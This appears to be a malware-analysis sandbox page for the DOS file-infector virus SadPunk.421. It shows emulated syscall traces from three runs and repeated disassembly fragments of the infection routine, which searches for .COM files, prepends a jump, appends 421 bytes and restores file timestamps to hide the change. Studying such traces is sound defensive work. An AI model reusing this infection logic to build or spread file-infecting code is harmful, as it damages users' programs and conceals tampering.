Sample viewer

vx.netlux.org/Virus.DOS.IVP.SadPunk.421

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:04:04.765876583Z 26 PC: 12b7b | Set disk transfer address
2018-12-17T23:04:04.767885856Z 71 PC: 12a90 | Get current directory
2018-12-17T23:04:04.772079072Z 78 PC: 12ac9 | Find first file
2018-12-17T23:04:04.779427097Z 61 PC: 12b84 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:04:04.788456488Z 63 PC: 12ae4 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T23:04:04.796898717Z 62 PC: 12ae8 | Close file
2018-12-17T23:04:04.799577575Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:04.817921855Z 61 PC: 12b84 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:04:04.827667549Z 64 PC: 12b38 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:04.831277775Z 66 PC: 12b76 | Move file pointer
2018-12-17T23:04:04.833424919Z 44 PC: 12b43 | Get time 0x12b43: cmp dh, 0
0x12b46: je 0x12b3f
0x12b48: mov byte ptr cs:[bp + 0x282], dh
0x12b4d: call 0x12b9c
0x12b50: mov ax, 0x5701
0x12b53: mov cx, word ptr cs:[bp + 0x31a]
0x12b58: mov dx, word ptr cs:[bp + 0x31c]
0x12b5d: int 0x21
0x12b5f: mov ah, 0x3e
0x12b61: int 0x21
0x12b63: xor cx, cx
0x12b65: mov cl, byte ptr cs:[bp + 0x319]
0x12b6a: call 0x12b86
0x12b6d: ret
0x12b6e: mov ah, 0x42
0x12b70: xor cx, cx
0x12b72: xor dx, dx
0x12b74: int 0x21
0x12b76: ret
0x12b77: mov ah, 0x1a
2018-12-17T23:04:04.840527178Z 64 PC: 12c1e | Write file or device (Write 421 bytes on handle 5)
2018-12-17T23:04:04.850028547Z 87 PC: 12b5f | Get or set file date and time
2018-12-17T23:04:04.85185013Z 62 PC: 12b63 | Close file
2018-12-17T23:04:04.861927441Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:04.873011652Z 79 PC: 12ac9 | Find next file
2018-12-17T23:04:04.876446118Z 61 PC: 12b84 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:04:04.884183311Z 63 PC: 12ae4 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T23:04:04.891930713Z 62 PC: 12ae8 | Close file
2018-12-17T23:04:04.89400649Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:04.905677462Z 61 PC: 12b84 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:04:04.91481727Z 64 PC: 12b38 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:04.918377764Z 66 PC: 12b76 | Move file pointer
2018-12-17T23:04:04.9202943Z 44 PC: 12b43 | Get time 0x12b43: cmp dh, 0
0x12b46: je 0x12b3f
0x12b48: mov byte ptr cs:[bp + 0x282], dh
0x12b4d: call 0x12b9c
0x12b50: mov ax, 0x5701
0x12b53: mov cx, word ptr cs:[bp + 0x31a]
0x12b58: mov dx, word ptr cs:[bp + 0x31c]
0x12b5d: int 0x21
0x12b5f: mov ah, 0x3e
0x12b61: int 0x21
0x12b63: xor cx, cx
0x12b65: mov cl, byte ptr cs:[bp + 0x319]
0x12b6a: call 0x12b86
0x12b6d: ret
0x12b6e: mov ah, 0x42
0x12b70: xor cx, cx
0x12b72: xor dx, dx
0x12b74: int 0x21
0x12b76: ret
0x12b77: mov ah, 0x1a
2018-12-17T23:04:04.924288256Z 64 PC: 12c1e | Write file or device (Write 421 bytes on handle 5)
2018-12-17T23:04:04.928239544Z 87 PC: 12b5f | Get or set file date and time
2018-12-17T23:04:04.929881967Z 62 PC: 12b63 | Close file
2018-12-17T23:04:04.93909819Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:04.950876499Z 79 PC: 12ac9 | Find next file
2018-12-17T23:04:04.954617015Z 61 PC: 12b84 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:04:04.962477805Z 63 PC: 12ae4 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T23:04:04.97177772Z 62 PC: 12ae8 | Close file
2018-12-17T23:04:04.97513898Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:04.987662031Z 61 PC: 12b84 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:04:04.996282181Z 64 PC: 12b38 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:04.999330577Z 66 PC: 12b76 | Move file pointer
2018-12-17T23:04:05.000851813Z 44 PC: 12b43 | Get time 0x12b43: cmp dh, 0
0x12b46: je 0x12b3f
0x12b48: mov byte ptr cs:[bp + 0x282], dh
0x12b4d: call 0x12b9c
0x12b50: mov ax, 0x5701
0x12b53: mov cx, word ptr cs:[bp + 0x31a]
0x12b58: mov dx, word ptr cs:[bp + 0x31c]
0x12b5d: int 0x21
0x12b5f: mov ah, 0x3e
0x12b61: int 0x21
0x12b63: xor cx, cx
0x12b65: mov cl, byte ptr cs:[bp + 0x319]
0x12b6a: call 0x12b86
0x12b6d: ret
0x12b6e: mov ah, 0x42
0x12b70: xor cx, cx
0x12b72: xor dx, dx
0x12b74: int 0x21
0x12b76: ret
0x12b77: mov ah, 0x1a
2018-12-17T23:04:05.004350726Z 64 PC: 12c1e | Write file or device (Write 421 bytes on handle 5)
2018-12-17T23:04:05.015268284Z 87 PC: 12b5f | Get or set file date and time
2018-12-17T23:04:05.017331135Z 62 PC: 12b63 | Close file
2018-12-17T23:04:05.026133126Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:05.038299878Z 79 PC: 12ac9 | Find next file
2018-12-17T23:04:05.04137958Z 61 PC: 12b84 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:04:05.049101665Z 63 PC: 12ae4 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T23:04:05.057945022Z 62 PC: 12ae8 | Close file
2018-12-17T23:04:05.060353418Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:05.071250809Z 61 PC: 12b84 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:04:05.079746083Z 64 PC: 12b38 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:05.083116036Z 66 PC: 12b76 | Move file pointer
2018-12-17T23:04:05.085048963Z 44 PC: 12b43 | Get time 0x12b43: cmp dh, 0
0x12b46: je 0x12b3f
0x12b48: mov byte ptr cs:[bp + 0x282], dh
0x12b4d: call 0x12b9c
0x12b50: mov ax, 0x5701
0x12b53: mov cx, word ptr cs:[bp + 0x31a]
0x12b58: mov dx, word ptr cs:[bp + 0x31c]
0x12b5d: int 0x21
0x12b5f: mov ah, 0x3e
0x12b61: int 0x21
0x12b63: xor cx, cx
0x12b65: mov cl, byte ptr cs:[bp + 0x319]
0x12b6a: call 0x12b86
0x12b6d: ret
0x12b6e: mov ah, 0x42
0x12b70: xor cx, cx
0x12b72: xor dx, dx
0x12b74: int 0x21
0x12b76: ret
0x12b77: mov ah, 0x1a
2018-12-17T23:04:05.087875139Z 64 PC: 12c1e | Write file or device (Write 421 bytes on handle 5)
2018-12-17T23:04:05.090760189Z 87 PC: 12b5f | Get or set file date and time
2018-12-17T23:04:05.092059797Z 62 PC: 12b63 | Close file
2018-12-17T23:04:05.098227342Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:05.10480175Z 79 PC: 12ac9 | Find next file
2018-12-17T23:04:05.106775315Z 61 PC: 12b84 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:04:05.114608226Z 63 PC: 12ae4 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T23:04:05.119744824Z 62 PC: 12ae8 | Close file
2018-12-17T23:04:05.121500076Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:05.125034056Z 61 PC: 12b84 | Open file (Filename = 'PRINTA~1.COM�')
2018-12-17T23:04:05.129084341Z 64 PC: 12b38 | Write file or device (Write 3 bytes on handle 2)
2018-12-17T23:04:05.13139766Z 66 PC: 12b76 | Move file pointer
2018-12-17T23:04:05.132613767Z 44 PC: 12b43 | Get time 0x12b43: cmp dh, 0
0x12b46: je 0x12b3f
0x12b48: mov byte ptr cs:[bp + 0x282], dh
0x12b4d: call 0x12b9c
0x12b50: mov ax, 0x5701
0x12b53: mov cx, word ptr cs:[bp + 0x31a]
0x12b58: mov dx, word ptr cs:[bp + 0x31c]
0x12b5d: int 0x21
0x12b5f: mov ah, 0x3e
0x12b61: int 0x21
0x12b63: xor cx, cx
0x12b65: mov cl, byte ptr cs:[bp + 0x319]
0x12b6a: call 0x12b86
0x12b6d: ret
0x12b6e: mov ah, 0x42
0x12b70: xor cx, cx
0x12b72: xor dx, dx
0x12b74: int 0x21
0x12b76: ret
0x12b77: mov ah, 0x1a
2018-12-17T23:04:05.135353179Z 64 PC: 12c1e | Write file or device (Write 421 bytes on handle 2)
2018-12-17T23:04:05.144162949Z 87 PC: 12b5f | Get or set file date and time
2018-12-17T23:04:05.1456905Z 62 PC: 12b63 | Close file
2018-12-17T23:04:05.148003868Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:05.151278633Z 79 PC: 12ac9 | Find next file
2018-12-17T23:04:05.153577413Z 61 PC: 12b84 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:04:05.159193555Z 63 PC: 12ae4 | Read file or device (Read 26 bytes on handle 2)
2018-12-17T23:04:05.164672515Z 62 PC: 12ae8 | Close file
2018-12-17T23:04:05.169475215Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:05.176950018Z 61 PC: 12b84 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:04:05.18234319Z 64 PC: 12b38 | Write file or device (Write 3 bytes on handle 2)
2018-12-17T23:04:05.184514322Z 66 PC: 12b76 | Move file pointer
2018-12-17T23:04:05.186036187Z 44 PC: 12b43 | Get time 0x12b43: cmp dh, 0
0x12b46: je 0x12b3f
0x12b48: mov byte ptr cs:[bp + 0x282], dh
0x12b4d: call 0x12b9c
0x12b50: mov ax, 0x5701
0x12b53: mov cx, word ptr cs:[bp + 0x31a]
0x12b58: mov dx, word ptr cs:[bp + 0x31c]
0x12b5d: int 0x21
0x12b5f: mov ah, 0x3e
0x12b61: int 0x21
0x12b63: xor cx, cx
0x12b65: mov cl, byte ptr cs:[bp + 0x319]
0x12b6a: call 0x12b86
0x12b6d: ret
0x12b6e: mov ah, 0x42
0x12b70: xor cx, cx
0x12b72: xor dx, dx
0x12b74: int 0x21
0x12b76: ret
0x12b77: mov ah, 0x1a
2018-12-17T23:04:05.188652994Z 64 PC: 12c1e | Write file or device (Write 421 bytes on handle 2)
2018-12-17T23:04:05.194567225Z 87 PC: 12b5f | Get or set file date and time
2018-12-17T23:04:05.196185312Z 62 PC: 12b63 | Close file
2018-12-17T23:04:05.2033451Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:05.226250228Z 79 PC: 12ac9 | Find next file
2018-12-17T23:04:05.230761801Z 61 PC: 12b84 | Open file (Filename = 'PAH.COM')
2018-12-17T23:04:05.239318424Z 63 PC: 12ae4 | Read file or device (Read 26 bytes on handle 2)
2018-12-17T23:04:05.247424817Z 62 PC: 12ae8 | Close file
2018-12-17T23:04:05.252440295Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:05.26619443Z 61 PC: 12b84 | Open file (Filename = 'PAH.COM')
2018-12-17T23:04:05.279049736Z 64 PC: 12b38 | Write file or device (Write 3 bytes on handle 2)
2018-12-17T23:04:05.282261824Z 66 PC: 12b76 | Move file pointer
2018-12-17T23:04:05.284142519Z 44 PC: 12b43 | Get time 0x12b43: cmp dh, 0
0x12b46: je 0x12b3f
0x12b48: mov byte ptr cs:[bp + 0x282], dh
0x12b4d: call 0x12b9c
0x12b50: mov ax, 0x5701
0x12b53: mov cx, word ptr cs:[bp + 0x31a]
0x12b58: mov dx, word ptr cs:[bp + 0x31c]
0x12b5d: int 0x21
0x12b5f: mov ah, 0x3e
0x12b61: int 0x21
0x12b63: xor cx, cx
0x12b65: mov cl, byte ptr cs:[bp + 0x319]
0x12b6a: call 0x12b86
0x12b6d: ret
0x12b6e: mov ah, 0x42
0x12b70: xor cx, cx
0x12b72: xor dx, dx
0x12b74: int 0x21
0x12b76: ret
0x12b77: mov ah, 0x1a
2018-12-17T23:04:05.287193386Z 64 PC: 12c1e | Write file or device (Write 421 bytes on handle 2)
2018-12-17T23:04:05.290977182Z 87 PC: 12b5f | Get or set file date and time
2018-12-17T23:04:05.292905278Z 62 PC: 12b63 | Close file
2018-12-17T23:04:05.303105961Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:04:05.315082386Z 79 PC: 12ac9 | Find next file
2018-12-17T23:04:05.318396778Z 61 PC: 12b84 | Open file (Filename = 'TEST.COM')
2018-12-17T23:04:05.328749681Z 63 PC: 12ae4 | Read file or device (Read 26 bytes on handle 2)
2018-12-17T23:04:05.336534452Z 62 PC: 12ae8 | Close file
2018-12-17T23:04:05.338601284Z 79 PC: 12ac9 | Find next file
2018-12-17T23:04:05.342528812Z 59 PC: 12a9f | Change current directory
2018-12-17T23:04:05.347438773Z 42 PC: 12aa5 | Get date 0x12aa5: cmp dx, 0xf03
0x12aa9: jne 0x12ab3
0x12aab: mov ah, 9
0x12aad: lea dx, word ptr [bp + 0x283]
0x12ab1: int 0x21
0x12ab3: lea dx, word ptr [bp + 0x2c4]
0x12ab7: mov ah, 0x3b
0x12ab9: int 0x21
0x12abb: mov dx, 0x80
0x12abe: call 0x12b77
0x12ac1: ret
0x12ac2: mov ah, 0x4e
0x12ac4: mov cx, 7
0x12ac7: int 0x21
0x12ac9: jb 0x12ad2
0x12acb: call 0x12ad3
0x12ace: mov ah, 0x4f
0x12ad0: jmp 0x12ac7
0x12ad2: ret
0x12ad3: mov ax, 0x3d00
2018-12-17T23:04:05.350548559Z 59 PC: 12abb | Change current directory
2018-12-17T23:04:05.353355516Z 26 PC: 12b7b | Set disk transfer address
2018-12-17T23:04:05.355200128Z 9 PC: 12a47 | Display string (String= 'Sleeping, Press a Key...')
2018-12-17T23:04:05.35956959Z 1 PC: 12a4b | Character input

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14762,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:38.479368523Z 26 PC: 12b7b | Set disk transfer address
2018-12-25T12:41:38.482537039Z 71 PC: 12a90 | Get current directory
2018-12-25T12:41:38.485262298Z 78 PC: 12ac9 | Find first file
2018-12-25T12:41:38.492119352Z 61 PC: 12b84 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:38.499265384Z 63 PC: 12ae4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:41:38.505449633Z 62 PC: 12ae8 | Close file
2018-12-25T12:41:38.507255069Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:41:38.528373678Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.535161538Z 64 PC: 12b38 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:41:38.537743763Z 66 PC: 12b76 | Move file pointer
2018-12-25T12:41:38.539004822Z 44 PC: 12b43 | Get time 0x12b43: cmp dh, 0
0x12b46: je 0x12b3f
0x12b48: mov byte ptr cs:[bp + 0x282], dh
0x12b4d: call 0x12b9c
0x12b50: mov ax, 0x5701
0x12b53: mov cx, word ptr cs:[bp + 0x31a]
0x12b58: mov dx, word ptr cs:[bp + 0x31c]
0x12b5d: int 0x21
0x12b5f: mov ah, 0x3e
0x12b61: int 0x21
0x12b63: xor cx, cx
0x12b65: mov cl, byte ptr cs:[bp + 0x319]
0x12b6a: call 0x12b86
0x12b6d: ret
0x12b6e: mov ah, 0x42
0x12b70: xor cx, cx
0x12b72: xor dx, dx
0x12b74: int 0x21
0x12b76: ret
0x12b77: mov ah, 0x1a
2018-12-25T12:41:38.541511096Z 64 PC: 12c1e | Write file or device (Write 421 bytes on handle 5)
2018-12-25T12:41:38.549892197Z 87 PC: 12b5f | Get or set file date and time
2018-12-25T12:41:38.551773038Z 62 PC: 12b63 | Close file
2018-12-25T12:41:38.560046441Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.566309476Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:38.568522796Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.574049168Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:38.580280381Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:38.582345369Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.592355309Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.596454475Z 64 PC: 12b38 | Write file or device (See above)
2018-12-25T12:41:38.598278174Z 66 PC: 12b76 | Move file pointer (See above)
2018-12-25T12:41:38.600329241Z 44 PC: 12b43 | Get time (See above)
2018-12-25T12:41:38.602117193Z 64 PC: 12c1e | Write file or device (See above)
2018-12-25T12:41:38.604048785Z 87 PC: 12b5f | Get or set file date and time (See above)
2018-12-25T12:41:38.605909164Z 62 PC: 12b63 | Close file (See above)
2018-12-25T12:41:38.611539757Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.621252379Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:38.624952018Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.636617722Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:38.643665206Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:38.64651984Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.656565422Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.663117429Z 64 PC: 12b38 | Write file or device (See above)
2018-12-25T12:41:38.66607004Z 66 PC: 12b76 | Move file pointer (See above)
2018-12-25T12:41:38.667860482Z 44 PC: 12b43 | Get time (See above)
2018-12-25T12:41:38.67019222Z 64 PC: 12c1e | Write file or device (See above)
2018-12-25T12:41:38.678477963Z 87 PC: 12b5f | Get or set file date and time (See above)
2018-12-25T12:41:38.68086863Z 62 PC: 12b63 | Close file (See above)
2018-12-25T12:41:38.688417819Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.699104824Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:38.702959736Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.710404445Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:38.716591994Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:38.719625096Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.730135975Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.737690014Z 64 PC: 12b38 | Write file or device (See above)
2018-12-25T12:41:38.741930256Z 66 PC: 12b76 | Move file pointer (See above)
2018-12-25T12:41:38.743855939Z 44 PC: 12b43 | Get time (See above)
2018-12-25T12:41:38.746760775Z 64 PC: 12c1e | Write file or device (See above)
2018-12-25T12:41:38.750228796Z 87 PC: 12b5f | Get or set file date and time (See above)
2018-12-25T12:41:38.752270304Z 62 PC: 12b63 | Close file (See above)
2018-12-25T12:41:38.759620447Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.770012454Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:38.772231384Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.777131171Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:38.782768466Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:38.785189759Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.788282557Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.793034508Z 64 PC: 12b38 | Write file or device (See above)
2018-12-25T12:41:38.795020768Z 66 PC: 12b76 | Move file pointer (See above)
2018-12-25T12:41:38.796228518Z 44 PC: 12b43 | Get time (See above)
2018-12-25T12:41:38.798848747Z 64 PC: 12c1e | Write file or device (See above)
2018-12-25T12:41:38.80725974Z 87 PC: 12b5f | Get or set file date and time (See above)
2018-12-25T12:41:38.808936781Z 62 PC: 12b63 | Close file (See above)
2018-12-25T12:41:38.812080975Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.81614369Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:38.818844665Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.825925597Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:38.832154827Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:38.83415885Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.84646724Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.853222109Z 64 PC: 12b38 | Write file or device (See above)
2018-12-25T12:41:38.859668841Z 66 PC: 12b76 | Move file pointer (See above)
2018-12-25T12:41:38.862156444Z 44 PC: 12b43 | Get time (See above)
2018-12-25T12:41:38.865780769Z 64 PC: 12c1e | Write file or device (See above)
2018-12-25T12:41:38.873087843Z 87 PC: 12b5f | Get or set file date and time (See above)
2018-12-25T12:41:38.874375662Z 62 PC: 12b63 | Close file (See above)
2018-12-25T12:41:38.880067144Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.886777954Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:38.896130039Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.903290582Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:38.910492514Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:38.912158899Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.928724444Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.935515682Z 64 PC: 12b38 | Write file or device (See above)
2018-12-25T12:41:38.938384852Z 66 PC: 12b76 | Move file pointer (See above)
2018-12-25T12:41:38.944701911Z 44 PC: 12b43 | Get time (See above)
2018-12-25T12:41:38.947514472Z 64 PC: 12c1e | Write file or device (See above)
2018-12-25T12:41:38.950532971Z 87 PC: 12b5f | Get or set file date and time (See above)
2018-12-25T12:41:38.952511577Z 62 PC: 12b63 | Close file (See above)
2018-12-25T12:41:38.959923079Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.969898284Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:38.973457646Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.981074867Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:38.987302154Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:38.989724115Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:38.992029844Z 59 PC: 12a9f | Change current directory
2018-12-25T12:41:38.995982063Z 42 PC: 12aa5 | Get date 0x12aa5: cmp dx, 0xf03
0x12aa9: jne 0x12ab3
0x12aab: mov ah, 9
0x12aad: lea dx, word ptr [bp + 0x283]
0x12ab1: int 0x21
0x12ab3: lea dx, word ptr [bp + 0x2c4]
0x12ab7: mov ah, 0x3b
0x12ab9: int 0x21
0x12abb: mov dx, 0x80
0x12abe: call 0x12b77
0x12ac1: ret
0x12ac2: mov ah, 0x4e
0x12ac4: mov cx, 7
0x12ac7: int 0x21
0x12ac9: jb 0x12ad2
0x12acb: call 0x12ad3
0x12ace: mov ah, 0x4f
0x12ad0: jmp 0x12ac7
0x12ad2: ret
0x12ad3: mov ax, 0x3d00
2018-12-25T12:41:38.998322501Z 59 PC: 12abb | Change current directory
2018-12-25T12:41:39.000006794Z 26 PC: 12b7b | Set disk transfer address (See above)
2018-12-25T12:41:39.001199168Z 9 PC: 12a47 | Display string (String= 'Sleeping, Press a Key...')
2018-12-25T12:41:39.004963271Z 1 PC: 12a4b | Character input

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14762,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:38.887895109Z 26 PC: 12b7b | Set disk transfer address
2018-12-25T12:41:38.890162259Z 71 PC: 12a90 | Get current directory
2018-12-25T12:41:38.893685886Z 78 PC: 12ac9 | Find first file
2018-12-25T12:41:38.900378413Z 61 PC: 12b84 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:38.907539283Z 63 PC: 12ae4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:41:38.915353265Z 62 PC: 12ae8 | Close file
2018-12-25T12:41:38.917745408Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:41:38.934959082Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.943165157Z 64 PC: 12b38 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:41:38.946678846Z 66 PC: 12b76 | Move file pointer
2018-12-25T12:41:38.948623598Z 44 PC: 12b43 | Get time 0x12b43: cmp dh, 0
0x12b46: je 0x12b3f
0x12b48: mov byte ptr cs:[bp + 0x282], dh
0x12b4d: call 0x12b9c
0x12b50: mov ax, 0x5701
0x12b53: mov cx, word ptr cs:[bp + 0x31a]
0x12b58: mov dx, word ptr cs:[bp + 0x31c]
0x12b5d: int 0x21
0x12b5f: mov ah, 0x3e
0x12b61: int 0x21
0x12b63: xor cx, cx
0x12b65: mov cl, byte ptr cs:[bp + 0x319]
0x12b6a: call 0x12b86
0x12b6d: ret
0x12b6e: mov ah, 0x42
0x12b70: xor cx, cx
0x12b72: xor dx, dx
0x12b74: int 0x21
0x12b76: ret
0x12b77: mov ah, 0x1a
2018-12-25T12:41:38.952469983Z 64 PC: 12c1e | Write file or device (Write 421 bytes on handle 5)
2018-12-25T12:41:38.962300066Z 87 PC: 12b5f | Get or set file date and time
2018-12-25T12:41:38.964073036Z 62 PC: 12b63 | Close file
2018-12-25T12:41:38.973269956Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:38.984077285Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:38.986784063Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:38.994267334Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:39.001855099Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:39.004378545Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:39.016582875Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:39.030476125Z 64 PC: 12b38 | Write file or device (See above)
2018-12-25T12:41:39.038277374Z 66 PC: 12b76 | Move file pointer (See above)
2018-12-25T12:41:39.040323692Z 44 PC: 12b43 | Get time (See above)
2018-12-25T12:41:39.043557076Z 64 PC: 12c1e | Write file or device (See above)
2018-12-25T12:41:39.046526922Z 87 PC: 12b5f | Get or set file date and time (See above)
2018-12-25T12:41:39.047889193Z 62 PC: 12b63 | Close file (See above)
2018-12-25T12:41:39.055974285Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:39.066618014Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:39.069336531Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:39.0768518Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:39.083727039Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:39.086406778Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:39.098634861Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:39.106369702Z 64 PC: 12b38 | Write file or device (See above)
2018-12-25T12:41:39.109689342Z 66 PC: 12b76 | Move file pointer (See above)
2018-12-25T12:41:39.112862338Z 44 PC: 12b43 | Get time (See above)
2018-12-25T12:41:39.119060292Z 64 PC: 12c1e | Write file or device (See above)
2018-12-25T12:41:39.128800649Z 87 PC: 12b5f | Get or set file date and time (See above)
2018-12-25T12:41:39.131314661Z 62 PC: 12b63 | Close file (See above)
2018-12-25T12:41:39.140392267Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:39.151873602Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:39.155487825Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:39.163162982Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:39.170239365Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:39.172316445Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:39.183750169Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:39.190995297Z 64 PC: 12b38 | Write file or device (See above)
2018-12-25T12:41:39.193883629Z 66 PC: 12b76 | Move file pointer (See above)
2018-12-25T12:41:39.196109876Z 44 PC: 12b43 | Get time (See above)
2018-12-25T12:41:39.198747094Z 64 PC: 12c1e | Write file or device (See above)
2018-12-25T12:41:39.202188424Z 87 PC: 12b5f | Get or set file date and time (See above)
2018-12-25T12:41:39.204427501Z 62 PC: 12b63 | Close file (See above)
2018-12-25T12:41:39.212698613Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:39.224056534Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:39.227877498Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:39.235286964Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:39.240248253Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:39.242446563Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:39.247657358Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:39.252785766Z 64 PC: 12b38 | Write file or device (See above)
